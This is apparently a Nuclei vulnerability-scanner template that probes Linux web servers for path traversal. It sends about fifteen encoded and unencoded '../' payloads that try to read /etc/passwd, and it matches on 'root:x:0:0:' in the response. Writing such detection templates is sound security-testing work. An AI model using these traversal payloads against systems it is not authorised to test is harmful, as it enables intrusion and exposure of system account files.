id: linux-path-traversal-passwd-xandsz22

info:
  name: Linux Path Traversal - /etc/passwd (Deep Traversal)22
  author: xandsz
  severity: medium
  description: |
    Detecta Path Traversal em servidores Linux tentando acessar
    /etc/passwd usando múltiplos níveis (5+ casas) e variações de encoding.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cwe-id: CWE-22
  metadata:
    max-request: 20
  tags: traversal,lfi,linux

http:
  - method: GET

    headers:
      X-Requested-With: XMLHttpRequest

    path:
      # === 5 níveis ===
      - "{{BaseURL}}/../../../../../etc/passwd"
      - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
      - "{{BaseURL}}/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
      - "{{BaseURL}}/%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd"

      # === 6 níveis ===
      - "{{BaseURL}}/../../../../../../etc/passwd"
      - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"

      # === 7 níveis ===
      - "{{BaseURL}}/../../../../../../../etc/passwd"
      - "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"

      # === 8 níveis ===
      - "{{BaseURL}}/../../../../../../../../etc/passwd"
      - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"

      # === Double encoding profundo ===
      - "{{BaseURL}}/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd"

      # === Mixed encoding ===
      - "{{BaseURL}}/..%252f..%252f..%252f..%252f..%252fetc%252fpasswd"

      # === Path confusion ===
      - "{{BaseURL}}/....//....//....//etc/passwd"
      - "{{BaseURL}}/..././..././..././etc/passwd"

      # === Null byte ===
      - "{{BaseURL}}/../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "root:x:0:0:"

      - type: status
        status:
          - 200
